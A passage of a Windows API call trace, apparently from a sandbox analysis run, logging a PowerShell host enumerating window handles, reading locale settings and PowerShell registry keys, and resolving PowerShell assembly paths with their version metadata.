	[0262.339] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xa74
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x694
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xa28
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x9b0
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x8d8
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x940
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x93c
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4ec
	[0262.339] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x150
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x720
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x3c4
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x7d4
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x6c8
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xb54
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xb54
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xb5c
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x838
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x818
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x5b8
	[0262.340] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x494
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x1ec
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x440
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x7e8
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x730
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x2c8
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x31c
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x330
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x128
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x5c8
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x6f8
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x358
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x73c
	[0262.341] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0xb0
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x250
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x240
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x790
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x61c
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x568
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x538
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x540
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x510
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x460
	[0262.342] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x79c
	[0262.343] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x4e0
	[0262.343] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x460
	[0262.343] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1cdd20 | out: lpdwProcessId=0x1cdd20) returned 0x778
	[0262.346] WerSetFlags () returned 0x0
	[0262.352] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0262.352] CoTaskMemFree (pv=0x0) 
	[0262.352] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce088, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce080 | out: pulNumLanguages=0x1ce088, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce080) returned 1
	[0262.353] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce088, pwszLanguagesBuffer=0x2cd0a00, pcchLanguagesBuffer=0x1ce080 | out: pulNumLanguages=0x1ce088, pwszLanguagesBuffer=0x2cd0a00, pcchLanguagesBuffer=0x1ce080) returned 1
	[0262.357] CoTaskMemAlloc (cb=0x24) returned 0x2e0470
	[0262.357] GetUserDefaultLocaleName (in: lpLocaleName=0x2e0470, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0262.357] CoTaskMemFree (pv=0x2e0470) 
	[0262.378] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0262.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0262.378] CoTaskMemFree (pv=0x246570) 
	[0263.054] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0263.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.054] CoTaskMemFree (pv=0x246570) 
	[0263.056] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0263.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.056] CoTaskMemFree (pv=0x246570) 
	[0263.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.075] SetErrorMode (uMode=0x1) returned 0x1
	[0263.075] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdd00 | out: lpFileInformation=0x1cdd00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0263.075] SetErrorMode (uMode=0x1) returned 0x1
	[0263.075] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdf70 | out: lpdwHandle=0x1cdf70) returned 0x94c
	[0263.076] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cd4290 | out: lpData=0x2cd4290) returned 1
	[0263.077] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdee8, puLen=0x1cdee0 | out: lplpBuffer=0x1cdee8*=0x2cd432c, puLen=0x1cdee0) returned 1
	[0263.077] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd4408, puLen=0x1cde50) returned 1
	[0263.077] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0263.077] CoTaskMemAlloc (cb=0x2e) returned 0x2e2a10
	[0263.077] lstrcpyW (in: lpString1=0x2e2a10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0263.077] CoTaskMemFree (pv=0x2e2a10) 
	[0263.077] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd445c, puLen=0x1cde50) returned 1
	[0263.077] lstrlenW (lpString="System.Management.Automation") returned 28
	[0263.077] CoTaskMemAlloc (cb=0x3c) returned 0x2e9ee0
	[0263.078] lstrcpyW (in: lpString1=0x2e9ee0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0263.078] CoTaskMemFree (pv=0x2e9ee0) 
	[0263.078] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd44b8, puLen=0x1cde50) returned 1
	[0263.078] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0263.078] CoTaskMemAlloc (cb=0x20) returned 0x2e7170
	[0263.078] lstrcpyW (in: lpString1=0x2e7170, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0263.078] CoTaskMemFree (pv=0x2e7170) 
	[0263.078] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd44f8, puLen=0x1cde50) returned 1
	[0263.078] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0263.078] CoTaskMemAlloc (cb=0x44) returned 0x2e9ee0
	[0263.078] lstrcpyW (in: lpString1=0x2e9ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0263.078] CoTaskMemFree (pv=0x2e9ee0) 
	[0263.078] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd4560, puLen=0x1cde50) returned 1
	[0263.078] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0263.078] CoTaskMemAlloc (cb=0x76) returned 0x28fec0
	[0263.078] lstrcpyW (in: lpString1=0x28fec0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0263.078] CoTaskMemFree (pv=0x28fec0) 
	[0263.078] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd45fc, puLen=0x1cde50) returned 1
	[0263.078] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0263.078] CoTaskMemAlloc (cb=0x44) returned 0x2e9ee0
	[0263.078] lstrcpyW (in: lpString1=0x2e9ee0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0263.078] CoTaskMemFree (pv=0x2e9ee0) 
	[0263.078] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd4660, puLen=0x1cde50) returned 1
	[0263.078] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0263.078] CoTaskMemAlloc (cb=0x58) returned 0x2b5210
	[0263.078] lstrcpyW (in: lpString1=0x2b5210, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0263.078] CoTaskMemFree (pv=0x2b5210) 
	[0263.078] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd46dc, puLen=0x1cde50) returned 1
	[0263.078] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0263.079] CoTaskMemAlloc (cb=0x20) returned 0x2e7170
	[0263.079] lstrcpyW (in: lpString1=0x2e7170, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0263.079] CoTaskMemFree (pv=0x2e7170) 
	[0263.079] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x2cd4384, puLen=0x1cde50) returned 1
	[0263.079] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0263.079] CoTaskMemAlloc (cb=0x66) returned 0x2df220
	[0263.079] lstrcpyW (in: lpString1=0x2df220, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0263.079] CoTaskMemFree (pv=0x2df220) 
	[0263.079] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x0, puLen=0x1cde50) returned 0
	[0263.079] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x0, puLen=0x1cde50) returned 0
	[0263.079] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cde58, puLen=0x1cde50 | out: lplpBuffer=0x1cde58*=0x0, puLen=0x1cde50) returned 0
	[0263.079] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cde28, puLen=0x1cde20 | out: lplpBuffer=0x1cde28*=0x2cd432c, puLen=0x1cde20) returned 1
	[0263.079] CoTaskMemAlloc (cb=0x204) returned 0x292480
	[0263.079] VerLanguageNameW (in: wLang=0x0, szLang=0x292480, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0263.079] CoTaskMemFree (pv=0x292480) 
	[0263.079] VerQueryValueW (in: pBlock=0x2cd4290, lpSubBlock="\\", lplpBuffer=0x1cde78, puLen=0x1cde70 | out: lplpBuffer=0x1cde78*=0x2cd42b8, puLen=0x1cde70) returned 1
	[0263.087] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0263.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.087] CoTaskMemFree (pv=0x246570) 
	[0263.088] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0263.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.088] CoTaskMemFree (pv=0x246570) 
	[0263.091] lstrlenW (lpString="䅁") returned 1
	[0263.775] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdd48 | out: phkResult=0x1cdd48*=0x300) returned 0x0
	[0263.777] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdd38 | out: phkResult=0x1cdd38*=0x304) returned 0x0
	[0263.777] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cddc8 | out: phkResult=0x1cddc8*=0x308) returned 0x0
	[0263.781] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdd0c, lpData=0x0, lpcbData=0x1cdd08*=0x0 | out: lpType=0x1cdd0c*=0x1, lpData=0x0, lpcbData=0x1cdd08*=0x56) returned 0x0
	[0263.782] CoTaskMemAlloc (cb=0x5a) returned 0x2df1b0
	[0263.782] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdcdc, lpData=0x2df1b0, lpcbData=0x1cdcd8*=0x56 | out: lpType=0x1cdcdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdcd8*=0x56) returned 0x0
	[0263.782] CoTaskMemFree (pv=0x2df1b0) 
	[0263.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.814] CoTaskMemAlloc (cb=0x104) returned 0x246570
	[0263.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.815] CoTaskMemFree (pv=0x246570) 
	[0267.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0267.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0267.760] CoTaskMemAlloc (cb=0x104) returned 0x246680
	[0267.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.760] CoTaskMemFree (pv=0x246680) 
	[0267.761] CoTaskMemAlloc (cb=0x104) returned 0x246680
	[0267.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.199] CoTaskMemFree (pv=0x246680) 
	[0268.225] CoTaskMemAlloc (cb=0x104) returned 0x246680
	[0268.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.225] CoTaskMemFree (pv=0x246680) 
	[0268.225] CoTaskMemAlloc (cb=0x104) returned 0x246680
	[0268.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.225] CoTaskMemFree (pv=0x246680) 
	[0268.225] CoTaskMemAlloc (cb=0x104) returned 0x246680
	[0268.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.226] CoTaskMemFree (pv=0x246680) 
	[0269.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0269.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0269.287] CoTaskMemAlloc (cb=0x104) returned 0x246680
	[0269.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.287] CoTaskMemFree (pv=0x246680) 
	[0269.290] CoTaskMemAlloc (cb=0x104) returned 0x246680
	[0269.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.822] CoTaskMemFree (pv=0x246680) 
	[0269.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0274.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0275.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
